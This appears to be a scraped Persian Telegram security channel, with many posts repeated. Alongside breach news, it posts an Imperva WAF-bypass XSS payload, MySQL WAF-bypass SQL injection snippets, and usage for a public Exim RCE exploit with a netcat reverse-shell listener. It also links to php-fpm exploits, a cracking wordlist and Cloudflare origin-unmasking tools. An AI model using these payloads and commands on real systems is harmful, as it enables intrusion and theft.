اطلاعات بیش از ۷ میلیون عضو سرویس ابری adobe بصورت محافظت نشده در دسترس عموم قرار داشت.
این دیتابیس مربوط به سرویس Adobe Creative Cloud بود که حاوی مشخصات کاربران سرویس های مختلف adobe از جمله آدرس ایمیل، کشور، وضعیت پرداخت و ... می باشد.
در حال حاضر این دیتابیس که از نوع elasticsearch است امن شده.
اطلاعات بیشتر در خصوص این مشکل و تایم لاین کشف و برطرف سازی آن:
https://www.comparitech.com/blog/information-security/7-million-adobe-creative-cloud-accounts-exposed-to-the-public/
#breach
#adobe
#news
@sec_nerd
این دیتابیس مربوط به سرویس Adobe Creative Cloud بود که حاوی مشخصات کاربران سرویس های مختلف adobe از جمله آدرس ایمیل، کشور، وضعیت پرداخت و ... می باشد.
در حال حاضر این دیتابیس که از نوع elasticsearch است امن شده.
اطلاعات بیشتر در خصوص این مشکل و تایم لاین کشف و برطرف سازی آن:
https://www.comparitech.com/blog/information-security/7-million-adobe-creative-cloud-accounts-exposed-to-the-public/
#breach
#adobe
#news
@sec_nerd
امنیت اطلاعات
آسیب پذیری جدیدی از نوع RCE در php-fpm کشف شده است https://bugs.php.net/bug.php?id=78599 و با وجود پچ شدن آن به تازگی، سرور های آسیب پذیر فراوانی با ترکیب nginx و php یافت میشوند اکسپلویت: https://github.com/neex/phuip-fpizdam #php #nginx #rce @sec_nerd
"Once a vulnerable target has been identified, attackers can send specially crafted requests by appending '?a=' in the URL to a vulnerable web server."
https://www.zdnet.com/article/nasty-php7-remote-code-execution-bug-exploited-in-the-wild/
#php
#nginx
#rce
@sec_nerd
https://www.zdnet.com/article/nasty-php7-remote-code-execution-bug-exploited-in-the-wild/
#php
#nginx
#rce
@sec_nerd
imperva WAF bypass
<bleh/onclick=top[/al/.source+/ert/.source]	``>click
#waf
#bugbounty
#imperva
@sec_nerd
<bleh/onclick=top[/al/.source+/ert/.source]	``>click
#waf
#bugbounty
#imperva
@sec_nerd
وردلیست ۸ گیگابایتی مناسب برای کرک هش
https://gofile.io/?c=NHXEGm
حجم کمپرس شده 2.7 گیگ
#hash
#crack
@sec_nerd
https://gofile.io/?c=NHXEGm
حجم کمپرس شده 2.7 گیگ
#hash
#crack
@sec_nerd
exploit.py
2.2 KB
انتشار اکسپلویت اجرای دستور از راه دور بر روی سرویس exim با شناسه CVE-2019-10149
نسخه های آسیب پذیر: از 4.87 تا 4.91
کارکرد:
روی سرور مهاجم netcat به این صورت:
nc -lvp 9000
و اجرای اسکریپت:
python ./exploit.py --rhost example.com --rport 25 --lhost 10.10.10.100 --lport 9000
https://github.com/Diefunction/CVE-2019-10149
#exim
#rce
#exploit
@sec_nerd
نسخه های آسیب پذیر: از 4.87 تا 4.91
کارکرد:
روی سرور مهاجم netcat به این صورت:
nc -lvp 9000
و اجرای اسکریپت:
python ./exploit.py --rhost example.com --rport 25 --lhost 10.10.10.100 --lport 9000
https://github.com/Diefunction/CVE-2019-10149
#exim
#rce
#exploit
@sec_nerd
👍1
۵ روز پیش سرویس ابری آمازون هدف حملات گسترده DDOS از سوی عوامل ناشناخته قرار گرفت.
این حملات باعث از کار افتادن قسمتی از سرویس های آمازون به مدت ۸ ساعت شد. از جمله این سرویس ها میتوان به S3 و RDS و SQS و CloudFront و نیز EC2 و ELB اشاره کرد.
از جمله شرکتهایی که از این خدمات بهره میبرند DigitalOcean است که در طی این حمله دچار مشکل شد.
ناتوانی آمازون در جلوگیری از این حمله آن هم به مدت ۸ ساعت در حالی اتفاق افتاد که این شرکت در سرویس های خود Shield Advanced را دارد که با پلن های مختلف مدعی ایجاد امنیت در برابر حملات DDOS است.
منبع:
https://www.hackread.com/aws-ddos-attacks-lasted-8-hours/
#news
#amazon
#ddos
@sec_nerd
این حملات باعث از کار افتادن قسمتی از سرویس های آمازون به مدت ۸ ساعت شد. از جمله این سرویس ها میتوان به S3 و RDS و SQS و CloudFront و نیز EC2 و ELB اشاره کرد.
از جمله شرکتهایی که از این خدمات بهره میبرند DigitalOcean است که در طی این حمله دچار مشکل شد.
ناتوانی آمازون در جلوگیری از این حمله آن هم به مدت ۸ ساعت در حالی اتفاق افتاد که این شرکت در سرویس های خود Shield Advanced را دارد که با پلن های مختلف مدعی ایجاد امنیت در برابر حملات DDOS است.
منبع:
https://www.hackread.com/aws-ddos-attacks-lasted-8-hours/
#news
#amazon
#ddos
@sec_nerd
HackRead
AWS hit by massive DDoS attacks that lasted 8 hours
Like us on Facebook @ /HackRead
امنیت اطلاعات
آسیب پذیری جدیدی از نوع RCE در php-fpm کشف شده است https://bugs.php.net/bug.php?id=78599 و با وجود پچ شدن آن به تازگی، سرور های آسیب پذیر فراوانی با ترکیب nginx و php یافت میشوند اکسپلویت: https://github.com/neex/phuip-fpizdam #php #nginx #rce @sec_nerd
داکر مخصوص آسیب پذیری php-fpm و nginx برای آزمایش آسیب پذیری RCE با شناسه CVE-2019-11043
https://github.com/akamajoris/CVE-2019-11043-Docker
#php
#nginx
#rce
#docker
@sec_nerd
https://github.com/akamajoris/CVE-2019-11043-Docker
#php
#nginx
#rce
#docker
@sec_nerd
GitHub
GitHub - akamajoris/CVE-2019-11043-Docker
Contribute to akamajoris/CVE-2019-11043-Docker development by creating an account on GitHub.
امنیت اطلاعات
PoC CVE-2019-11043 https://github.com/theMiddleBlue/CVE-2019-11043 #php #nginx #rce @sec_nerd
آنالیز فنی آسیب پذیری php-fpm و nginx توسط orange tsai
https://blog.orange.tw/2019/10/an-analysis-and-thought-about-recently.html
#php
#nginx
#rce
@sec_nerd
https://blog.orange.tw/2019/10/an-analysis-and-thought-about-recently.html
#php
#nginx
#rce
@sec_nerd
Orange Tsai
An analysis and thought about recently PHP-FPM RCE (CVE-2019-11043)
First of all, this is such a really interesting bug! From a small memory defect to code execution. It combines both binary and web technique so that’s why it interested me to trace into. This is just
راهکارهای پیدا کردن آی پی واقعی وبسایتهایی که از Cloudflare استفاده میکنند + ۲ ابزار برای این کار
https://www.secjuice.com/finding-real-ips-of-origin-servers-behind-cloudflare-or-tor/
ابزارها:
https://github.com/m0rtem/CloudFail
https://github.com/greycatz/CloudUnflare
#web
#pentest
#Cloudflare
@sec_nerd
https://www.secjuice.com/finding-real-ips-of-origin-servers-behind-cloudflare-or-tor/
ابزارها:
https://github.com/m0rtem/CloudFail
https://github.com/greycatz/CloudUnflare
#web
#pentest
#Cloudflare
@sec_nerd
Some MySQL tricks to break some #WAFs out there.
SELECT-1e1FROM`test`
SELECT~1.FROM`test`
SELECT\NFROM`test`
SELECT@^1.FROM`test`
SELECT-id-1.FROM`test`
#SQLi #bypass #bugbountytip
@sec_nerd
SELECT-1e1FROM`test`
SELECT~1.FROM`test`
SELECT\NFROM`test`
SELECT@^1.FROM`test`
SELECT-id-1.FROM`test`
#SQLi #bypass #bugbountytip
@sec_nerd
Forwarded from امنیت اطلاعات
رایت آپ کشف آسیب پذیری های متعدد از نوع XSS و CSRF و XXE و رسیدن به RCE در پلتفرم متن باز LabKey Server
https://rhinosecuritylabs.com/application-security/labkey-server-vulnerabilities-to-rce/
#writeup
#web
#pentest
#csrf
#xxe
#xss
#rce
@sec_nerd
https://rhinosecuritylabs.com/application-security/labkey-server-vulnerabilities-to-rce/
#writeup
#web
#pentest
#csrf
#xxe
#xss
#rce
@sec_nerd
Rhino Security Labs
Vulnerabilities Leading to RCE in LabKey Server
This post discusses 3 LabKey Server CVEs. The vulnerabilities, XSS, CSRF & XXE, can be used together to achieve RCE using intended functionality of the app.
بزرگترین دیتابیس کارتهای اعتباری شهروندان هندی در دارک نت به فروش گذاشته شد.
این دیتابیس حاوی اطلاعات کارتهای کردیت و دبیت بیش از 1.3 میلیون شهروند است که نزدیک به ۹۸ درصد آنان هندی هستند.
ارزش هر کارت ۱۰۰ دلار است بنابراین ارزش این دیتابیس ۱۳۰ میلیون دلار می باشد.
رکوردها حاوی اطلاعات magnetic strip نیز هستند که تمامی جزییات کارت از جمله مالک، شماره، تاریخ انقضا و احتمالا CVV و آدرس در آن وجود دارد.
این دیتابیس توسط گروه JokerStash یا همان Fin7 در دارک نت قرار داده شده است.
https://www.hackread.com/indian-credit-debit-card-records-on-dark-web/
#news
#breach
#india
#fin7
@sec_nerd
این دیتابیس حاوی اطلاعات کارتهای کردیت و دبیت بیش از 1.3 میلیون شهروند است که نزدیک به ۹۸ درصد آنان هندی هستند.
ارزش هر کارت ۱۰۰ دلار است بنابراین ارزش این دیتابیس ۱۳۰ میلیون دلار می باشد.
رکوردها حاوی اطلاعات magnetic strip نیز هستند که تمامی جزییات کارت از جمله مالک، شماره، تاریخ انقضا و احتمالا CVV و آدرس در آن وجود دارد.
این دیتابیس توسط گروه JokerStash یا همان Fin7 در دارک نت قرار داده شده است.
https://www.hackread.com/indian-credit-debit-card-records-on-dark-web/
#news
#breach
#india
#fin7
@sec_nerd
This media is not supported in your browser
VIEW IN TELEGRAM